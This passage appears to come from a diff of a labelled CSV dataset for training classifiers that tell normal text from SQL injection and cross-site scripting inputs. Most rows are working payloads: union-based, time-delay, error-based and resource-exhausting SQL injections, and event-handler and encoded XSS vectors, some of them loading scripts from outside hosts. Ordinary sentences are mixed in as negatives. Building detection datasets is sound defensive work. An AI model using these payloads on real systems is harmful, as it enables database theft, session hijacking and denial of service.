( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) -- nqdb",2,SQLi,19747 +-4901 ) or 3407 = 6442#,2,SQLi,18509 +"1"" ) ) union all select null--",2,SQLi,19352 +"<SCRIPT/XSS SRC=""http://google.com""></SCRIPT>",1,XSS,9528 +"1"" ) ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ( ""kfdh"" like ""kfdh",2,SQLi,18962 +"select count ( * ) from generate_series ( 1,5000000 ) --",2,SQLi,12928 +1 or 1=1,2,SQLi,9995 +"-5066' ) ) union all select 9689,9689,9689,9689#",2,SQLi,20431 +<iframe id=x onfocus=alert(1)>,1,XSS,6761 +1' ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,16249 +"<plaintext draggable=""true"" ondrag=""alert(1)"">test</plaintext>",1,XSS,6952 +"<IMG SRC=""jav&#x0A;ascript:alert('XSS');"">",1,XSS,242 +1'|| ( select 'noik' from dual where 9851 = 9851,2,SQLi,12482 +"<link onmouseleave=""alert(1)"">test</link>",1,XSS,5118 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13",2,SQLi,10647 +"<P STYLE=""behavior:url('#default#time2')"" end=""0"" onEnd=""javascript:alert(1)"">",1,XSS,734 +"select * from users where id = '1' union select \#,@@VERSION -- 1'",2,SQLi,11506 +"-1269"" union all select 8412,8412,8412,8412,8412,8412,8412,8412--",2,SQLi,20407 +"1"" union all select null,null#",2,SQLi,21421 +"<style onReadyStateChange style onReadyStateChange=""javascript:javascript:alert(1)""></style onReadyStateChange>",1,XSS,370 +"Select the page on which you want to move an item, then click edit.",0,normal,25551 +setTimeout(,1,XSS,7108 +1'|| ( select 'kuxp' where 7123 = 7123 and 1688 = 4200#,2,SQLi,13697 +<select onchange=alert(1)><option>change me</option><option>XSS</option></select>,1,XSS,1967 +<var id=x tabindex=1 onactivate=alert(1)></var>,1,XSS,3452 +Where did you find that rare book?,0,normal,22928 +<time onpointermove=alert(1)>XSS</time>,1,XSS,5115 <script>\u0061lert(1)</script>,1,XSS,182 -<element onpointermove=alert(1)>XSS</element>,1,XSS,3685 -<link id=x tabindex=1 ondeactivate=alert(1)></link><input id=y autofocus>,1,XSS,7975 -"<tt onbeforecut=""alert(1)"" contenteditable>test</tt>",1,XSS,5164 -"1%"" and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""%"" = """,2,SQLi,22242 -"\""",2,SQLi,10426 -"-5231%"" or 4945 = 8402#",2,SQLi,22065 -"{""id"":null,""name"":""Vampire Bat""}",0,normal,25968 -"1%' union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,14798 -"{""id"":null,""firstName"":""Muthamil Selvi"",""lastName"":""Suppiah"",""address"":""70 Mechanic St"",""city"":""801"",""telephone"":""3520667888""}",0,normal,25446 -"<figcaption draggable=""true"" ondragstart=""alert(1)"">test</figcaption>",1,XSS,3800 -"-4966%"" union all select 4300,4300,4300,4300,4300,4300,4300,4300#",2,SQLi,14703 -select * from users where id = 1 or $<\ or 1 = 1 -- 1,2,SQLi,11912 -<s id=x tabindex=1 onactivate=alert(1)></s>,1,XSS,6670 +"<element draggable=""true"" ondragenter=""alert(1)"">test</element>",1,XSS,6683 +"1"" ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ""wdye"" like ""wdye",2,SQLi,13598 +"<rt onmousedown=""alert(1)"">test</rt>",1,XSS,3758 +"Contrary to the intent, the benefits skewed toward a select few companies in a select few industries.",0,normal,26222 +<strong id=x tabindex=1 ondeactivate=alert(1)></strong><input id=y autofocus>,1,XSS,8797 +"select sleep ( 5 ) and ""cyrb"" = ""cyrb",2,SQLi,12551 +"<plaintext oncontextmenu=""alert(1)"">test</plaintext>",1,XSS,8020 +"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,21991 +"-9698' ) ) as qnjv where 3360 = 3360 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,14927 +select sleep ( 5 ) and ( 'qcsv' = 'qcsv,2,SQLi,21378 +"1"" ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ""nwzu"" like ""nwzu",2,SQLi,12269 +<hgroup onpointerleave=alert(1)>XSS</hgroup>,1,XSS,6562 +"select * from users where id = 1 or ""{{"" or 1 = 1 -- 1",2,SQLi,11989 +Hormel said its products launched this week in select retail outlets.,0,normal,26043 +"1"" ) where 9359 = 9359 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,18127 +"-1439"" or 2849 = 8484 and ""pmdl"" = ""pmdl",2,SQLi,15965 +Where's the arena?,0,normal,23505 +<html onpointerover=alert(1)>XSS</html>,1,XSS,6607 +"1' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'aumk' like 'aumk",2,SQLi,18368 +<li id=x tabindex=1 onfocusin=alert(1)></li>,1,XSS,6629 +"<div draggable=""true"" contenteditable>drag me</div><em ondragover=alert(1) contenteditable>drop here</em>",1,XSS,4472 +"<main onkeyup=""alert(1)"" contenteditable>test</main>",1,XSS,3329 +-3982 ) ) or 6872 = 6872 and ( ( 6331 = 6331,2,SQLi,20042 +<basefont id=x tabindex=1 onbeforedeactivate=alert(1)></basefont><input autofocus>,1,XSS,3746 +1'|| ( select 'ozoj' where 1608 = 1608,2,SQLi,15740 +"-3007 ) where 6648 = 6648 union all select 6648,6648,6648,6648,6648,6648,6648,6648#",2,SQLi,20557 +select sleep ( 5 ) -- waln,2,SQLi,14406 +"<a id=""x""><rect fill=""white"" width=""1000"" height=""1000""/></a>",1,XSS,9011 +"1 ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( ( 2341 = 2341",2,SQLi,13996 +"<noframes onkeydown=""alert(1)"" contenteditable>test</noframes>",1,XSS,6625 +"or 1=1 +or 1=1 --",2,SQLi,9927 +"Home Depot: Up to 50% off select patio furniture; up to 40% off select kitchen and bath essentials, select exclusive semi-custom cabinets and select bath lighting; up to 30% off select bath faucets and shower heads and select storage solutions; up to 25% off with appliance special buys.",0,normal,26047 +"><s%2b""cript>alert(document.cookie)</script>",1,XSS,1645 +"First, you select a wallpaper platform — monitor or mobile phone — then select the dimensions depending on your device.",0,normal,26144 +"select * from users where id = 1 union select @ 1$,version ( ) -- 1",2,SQLi,11567 +"1 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) -- dkwz",2,SQLi,13621 +"<style>@keyframes x{}</style><param style=""animation-name:x"" onanimationend=""alert(1)""></param>",1,XSS,4966 +"1 ) or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,11410 +"</ foo=""><script>alert(91)</script>"">",1,XSS,8974 +Update your travel plans.,0,normal,22687 +"1"" ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ""ffcf"" like ""ffcf",2,SQLi,17260 +"-9553"" ) as geih where 6453 = 6453 or 8453 = 8159--",2,SQLi,12919 +"<dd onmouseup=""alert(1)"">test</dd>",1,XSS,4102 +"1 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) # mafe",2,SQLi,15300 +"<style>@keyframes x{}</style><dd style=""animation-name:x"" onanimationend=""alert(1)""></dd>",1,XSS,7801 +1 ) and 7533 = 7533 and ( 7175 = 7175,2,SQLi,22054 +"<sup onkeydown=""alert(1)"" contenteditable>test</sup>",1,XSS,6634 +"-2582'+ ( select ggim where 5346 = 5346 union all select 5346,5346#",2,SQLi,19103 +"1' ) ) ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16307 +"1' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and 'tuzl' = 'tuzl",2,SQLi,18357 +"1' ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( 'bzgs' like 'bzgs",2,SQLi,18488 +"1'|| ( select 'ymac' from dual where 9268 = 9268 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) ) ||'",2,SQLi,15259 +<xmp onpointerup=alert(1)>XSS</xmp>,1,XSS,2440 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11",2,SQLi,10317 +"1' where 9003 = 9003 and make_set ( 5868 = 8316,8316 ) --",2,SQLi,14525 +"1 union all select null,null,null,null,null,null,null,null#",2,SQLi,22369 +Home Depot is offering up to 20% off select Nest Thermostats.,0,normal,26050 +"1"" ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ""ycuo"" like ""ycuo",2,SQLi,18318 +<dir id=x tabindex=1 onfocusin=alert(1)></dir>,1,XSS,3435 +"<li onmouseup=""alert(1)"">test</li>",1,XSS,1839 +"<style>:target {transform: rotate(180deg);}</style><datalist id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></datalist>",1,XSS,4815 +""" Select Medical Holdings: ""It's very good, a very good hospital chain.",0,normal,26421 +"1' in boolean mode ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,18739 +"1 ) ) ) union all select null,null,null#",2,SQLi,19516 +"-1868 ) ) union all select 1859,1859--",2,SQLi,16191 +"<style>@keyframes x{}</style><tbody style=""animation-name:x"" onanimationend=""alert(1)""></tbody>",1,XSS,2565 +"<blockquote onmouseup=""alert(1)"">test</blockquote>",1,XSS,5901 +"<rp oncopy=""alert(1)"" contenteditable>test</rp>",1,XSS,4660 +<base id=x tabindex=1 onfocus=alert(1)></base>,1,XSS,3965 +Select your notice.,0,normal,24947 +"1%"" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ""%"" = """,2,SQLi,14835 +"Open Settings on your iPhone or iPad Search for the FaceTime option, or scroll to the option, and select the icon Switch the FaceTime toggle to off Open the FaceTime application on your Mac Select ""FaceTime"" in the menu bar Then select ""Turn FaceTime Off"" You can also choose to sign out of FaceTime completely on your Mac, as follows: Open the FaceTime application on your Mac Select ""FaceTime"" in the menu bar Then select ""Preferences"" Click ""Sign Out"" You should be good to go from there – be wary of any FaceTime requests from unknown callers, of course.",0,normal,25773 +-8684' where 9820 = 9820 or 6844 = 5105,2,SQLi,15806 +count,0,normal,23109 +"<canvas onmouseleave=""alert(1)"">test</canvas>",1,XSS,2725 +<legend onpointerleave=alert(1)>XSS</legend>,1,XSS,4744 +Delete the page.,0,normal,22845 +"<style>:target {color:red;}</style><center id=x style=""transition:color 1s"" ontransitionend=alert(1)></center>",1,XSS,8148 +"1%"" and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,15549 +"<rtc oncontextmenu=""alert(1)"">test</rtc>",1,XSS,1985 +<svg><param onload=alert(1)></param>,1,XSS,8565 +"Guys are seriously starting to understand that the Champions League is a TEAMHEAM, and it starts with the selection of players, even at Celtic. Talk about savvy picks and teams is not toxic, not for nothing and not stupid, and you can't say ""let him play what he wants or evade"" because it's stupid.",0,normal,26453 +<svg><bgsound onload=alert(1)></bgsound>,1,XSS,2504 +"<div draggable=""true"" contenteditable>drag me</div><address ondrop=alert(1) contenteditable>drop here</address>",1,XSS,2224 +Students intending to spend a year in Europe will be expected to select language electives.,0,normal,25481 +<ins onpointerout=alert(1)>XSS</ins>,1,XSS,7221 +"<header draggable=""true"" ondragstart=""alert(1)"">test</header>",1,XSS,2635 +"<style>@keyframes x{}</style><caption style=""animation-name:x"" onanimationend=""alert(1)""></caption>",1,XSS,4046 +"1 where 1992 = 1992 union all select null,null--",2,SQLi,13679 +<audio onpointerdown=alert(1)>XSS</audio>,1,XSS,2118 +"-6945' union all select 5063,5063,5063,5063,5063,5063,5063,5063--",2,SQLi,17035 +"1 where 5627 = 5627 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,16541 +"<menu draggable=""true"" ondrag=""alert(1)"">test</menu>",1,XSS,3948 +Select reload.,0,normal,24593 +"1"" ) where 3058 = 3058 union all select null--",2,SQLi,19754 +"-8331' ) union all select 1452,1452,1452,1452,1452--",2,SQLi,18336 +"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i",2,SQLi,11000 +"1"" ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ""chvi"" like ""chvi",2,SQLi,16266 +"<slot onmousemove=""alert(1)"">test</slot>",1,XSS,6718 +"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 7 ) ) AND 'i' = 'i",2,SQLi,11533 +"<noembed onmouseup=""alert(1)"">test</noembed>",1,XSS,4114 +<optgroup onpointerleave=alert(1)>XSS</optgroup>,1,XSS,2087 +1 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,15607 +<head id=x tabindex=1 onfocusin=alert(1)></head>,1,XSS,6092 +<p onpointerout=alert(1)>XSS</p>,1,XSS,3841 +"1"" where 1765 = 1765 union all select null,null,null,null,null,null#",2,SQLi,19479 +"1 ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( 3626 = 3626",2,SQLi,15448 +"<style>:target {color: red;}</style><legend id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></legend>",1,XSS,3416 +"<datalist onmouseleave=""alert(1)"">test</datalist>",1,XSS,2276 +1' ) and 2577 = 7094,2,SQLi,16903 +"-2570"" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ""dmch"" like ""dmch",2,SQLi,13685 +<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;,1,XSS,1555 +"select * from users where id = 1 or ""@?"" or 1 = 1 -- 1",2,SQLi,11819 +"<div draggable=""true"" contenteditable>drag me</div><embed ondragover=alert(1) contenteditable>drop here</embed>",1,XSS,1948 +You can even monitor the temperature and humidity of your baby's room on select models.,0,normal,25061 +"1'+ ( select xlvq where 7470 = 7470 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ) +'",2,SQLi,22166 +"-1920' ) ) ) union all select 1424,1424,1424,1424,1424,1424,1424,1424,1424,1424#",2,SQLi,20869 +AND 7300=7300 AND 'pKlZ'='pKlY,2,SQLi,10122 +"1' ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( 'javh' = 'javh",2,SQLi,22391 +"<textarea onmousedown=""alert(1)"">test</textarea>",1,XSS,5684 +"Price starts at $318.66, depending on what Mario game you select.",0,normal,25721 +"-4346' ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,20907 +"1"" ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,14676 +Where did you find that cozy coffee shop?,0,normal,23943 +<rtc id=x tabindex=1 ondeactivate=alert(1)></rtc><input id=y autofocus>,1,XSS,2947 +1' ) as tvqn where 2967 = 2967,2,SQLi,16393 +1%' ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( '%' = ',2,SQLi,19183 +"`'><script>\xC2\xA0javascript:alert(537)</script> +`'><script>\xE1\x9A\x80javascript:alert(1)</script>",1,XSS,8920 +"<noframes><img title=""</noframes><img src onerror=alert(1)>""></noframes>",1,XSS,117 +"1%"" and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ""%"" = """,2,SQLi,12706 +"<a href=""&#0000106avascript:alert(1)"">XSS</a>",1,XSS,189 +ORDER BY 25#,2,SQLi,10192 +1' ) rlike ( select ( case when ( 2721 = 8716 ) then 1 else 0x28 end ) ) and ( 'dumt' = 'dumt,2,SQLi,21209 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17",2,SQLi,10323 +")))) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,10944 +"1"" ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ""bxcb"" like ""bxcb",2,SQLi,12418 +"<;A HREF="";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"";>;XSS<;/A>;",1,XSS,1604 "`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> <a href=javas\x00cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,409 -"-5526 or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,21012 -"{""id"":null,""name"":""means""}",0,normal,25663 -"<svg onResize svg onResize=""javascript:javascript:alert(1)""></svg onResize>",1,XSS,350 -"<style>:target {transform: rotate(180deg);}</style><data id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></data>",1,XSS,4179 -<custom tags onpointerup=alert(1)>XSS</custom tags>,1,XSS,5467 -<big id=x tabindex=1 onfocus=alert(1)></big>,1,XSS,7377 -1 where 7516 = 7516 union all select null#,2,SQLi,17158 -1' ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( 'gzpx' = 'gzpx,2,SQLi,18669 -<dd onpointerout=alert(1)>XSS</dd>,1,XSS,5996 -"1' ) as fxuk where 6184 = 6184 and make_set ( 9292 = 2785,2785 ) --",2,SQLi,15328 -"<colgroup onbeforecut=""alert(1)"" contenteditable>test</colgroup>",1,XSS,5260 -"1' ) ) ) union all select null,null,null,null,null,null,null,null#",2,SQLi,19871 -"1"" ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ""rkvr"" = ""rkvr",2,SQLi,14200 -"<kbd draggable=""true"" ondragend=""alert(1)"">test</kbd>",1,XSS,5834 -"<dir draggable=""true"" ondragstart=""alert(1)"">test</dir>",1,XSS,5576 -Select your field.,0,normal,25040 -"<small onmouseout=""alert(1)"">test</small>",1,XSS,3499 -<input id=x tabindex=1 onbeforedeactivate=alert(1)></input><input autofocus>,1,XSS,3822 -1' ) ) as dago where 9788 = 9788,2,SQLi,17223 -"{""id"":null,""name"":""give""}",0,normal,25398 -"1%' ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,21169 -<datalist id=x tabindex=1 onbeforedeactivate=alert(1)></datalist><input autofocus>,1,XSS,3534 -1 WAITFOR DELAY '0:0:5',2,SQLi,11388 -Select a scent for the candle.,0,normal,24183 -ORDER BY 31337--,2,SQLi,10308 -"<embed src=""data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="">",1,XSS,1076 -"<label draggable=""true"" ondragenter=""alert(1)"">test</label>",1,XSS,3400 -1 ) order by 1#,2,SQLi,17507 -end and ( ( 'zeyr' = 'zeyr,2,SQLi,18718 -"<style>:target {color: red;}</style><button id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></button>",1,XSS,4025 -"or 0=0 -- -or 0=0 #",2,SQLi,10031 -&#60;,1,XSS,9823 -Let's explore where the forest begins.,0,normal,23854 -<noembed id=x tabindex=1 onactivate=alert(1)></noembed>,1,XSS,4450 -1' where 6116 = 6116,2,SQLi,13355 -<img onblur=alert(1) tabindex=1 id=x></img><input autofocus>,1,XSS,4642 -"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and 'nmat' like 'nmat",2,SQLi,16052 -"( select ( case when ( 3531 = 3531 ) then ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) else 3531 end ) )",2,SQLi,15247 -"<video onerror=""javascript:javascript:alert(1)""><source>",1,XSS,580 -"1"" ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( ""vfoh"" = ""vfoh",2,SQLi,20625 -"<hr onbeforepaste=""alert(1)"" contenteditable>test</hr>",1,XSS,3285 -Calculate totals where valid.,0,normal,23503 -group by userid having 1=1--,2,SQLi,10025 -"-8040"" ) ) ) or make_set ( 3916 = 6787,6787 ) and ( ( ( ""laar"" like ""laar",2,SQLi,17314 -"1"" ) as ztkr where 1532 = 1532",2,SQLi,12212 -"<applet draggable=""true"" ondrag=""alert(1)"">test</applet>",1,XSS,7457 -"1, ( select ( case when ( 8640 = 8640 ) then ( ascii ( regexp_substring ( repeat ( right ( char ( 8640 ) ,0 ) ,500000000 ) ,null ) ) ) else 8640/ ( select 0 from information_schema.system_users ) end ) from information_schema.system_users ) --",2,SQLi,15539 -"1"" ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ""xsfg"" like ""xsfg",2,SQLi,21998 -I'm thinking of where to spend my day off.,0,normal,23855 -Select approve.,0,normal,24755 -1' ) as scnn where 9274 = 9274,2,SQLi,15843 -She planted beautiful flowers in her garden.,0,normal,23094 -"<IMG SRC=""javascript:alert('');"">",1,XSS,4497 -I want to select the right song for the occasion.,0,normal,23956 -"1 ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( 5349 = 5349",2,SQLi,13354 -"1', ( select ( case when ( 2073 = 5314 ) then 1 else 1/ ( select 0 ) end ) )",2,SQLi,17962 -"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10956 -"<menu onbeforecut=""alert(1)"" contenteditable>test</menu>",1,XSS,8199 -Order a refreshing drink.,0,normal,22884 -"<var oncut=""alert(1)"" contenteditable>test</var>",1,XSS,6479 -Select a class to enroll in.,0,normal,24317 -"""),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10966 -"1%"" and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ""%"" = """,2,SQLi,13357 -onErrorUpdate,1,XSS,9660 -select * from users where id = 1 or \< = 1 or 1 = 1 -- 1,2,SQLi,11682 -"<dialog onkeydown=""alert(1)"" contenteditable>test</dialog>",1,XSS,2772 -"1 ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,20001 -"1 ) as jvuo where 6859 = 6859 union all select null,null,null,null,null,null,null#",2,SQLi,20302 -"1%' ) ) union all select null,null,null,null,null--",2,SQLi,19797 -<time id=x tabindex=1 onbeforedeactivate=alert(1)></time><input autofocus>,1,XSS,3877 -"<SCRIPT ="">"" SRC=""httx://xss.rocks/xss.js""></SCRIPT",1,XSS,291 -"inurl:"".php?searchst­ring=""",1,XSS,9384 -"1%' ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( '%' = '",2,SQLi,17841 -"1%"" ) and 8626 = 3626#",2,SQLi,15609 -"select * from users where id = 1. union select null,version ( ) -- 1",2,SQLi,11895 -I need to decide where to go for a nature hike.,0,normal,24093 -"1' ) ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,12553 -"1' ) where 8268 = 8268 union all select null,null,null,null--",2,SQLi,19895 -I'll select a new painting to hang in the living room.,0,normal,24088 -"<div draggable=""true"" contenteditable>drag me</div><plaintext ondrop=alert(1) contenteditable>drop here</plaintext>",1,XSS,6426 -"<rt onbeforepaste=""alert(1)"" contenteditable>test</rt>",1,XSS,2009 -"1' in boolean mode ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) #",2,SQLi,17505 -Modify the document format.,0,normal,22823 -"1"" ) ) as rcse where 4559 = 4559 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12460 -"1 where 7642 = 7642 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --",2,SQLi,19530 -"-5360' where 8178 = 8178 union all select 8178,8178,8178--",2,SQLi,19808 -"{""id"":null,""name"":""base""}",0,normal,25616 -"select * from users where id = 1 union select !<1,version ( ) -- 1",2,SQLi,11657 -"1%' ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and '%' = '",2,SQLi,16065 -<nextid onpointerup=alert(1)>XSS</nextid>,1,XSS,6746 -<marquee onstart=alert(1)></marquee>,1,XSS,8183 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#",2,SQLi,10667 -<tr onpointerleave=alert(1)>XSS</tr>,1,XSS,8294 -<center onpointerout=alert(1)>XSS</center>,1,XSS,6203 -Select your application.,0,normal,25125 -1' ) where 2928 = 2928,2,SQLi,13819 -"-1418"" ) where 7528 = 7528 order by 1#",2,SQLi,15234 -<xss onpointerleave=alert(1) style=display:block>XSS</xss>,1,XSS,89 -"1 ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 6265 = 6265",2,SQLi,21874 -<time id=x tabindex=1 onactivate=alert(1)></time>,1,XSS,4231 --3978 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) -- mtun,2,SQLi,20427 -<object id=x onfocus=alert(1) type=text/html>,1,XSS,2498 -1' where 8945 = 8945 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,21893 -!'/</title/'/</style/</script/</textarea/--><p 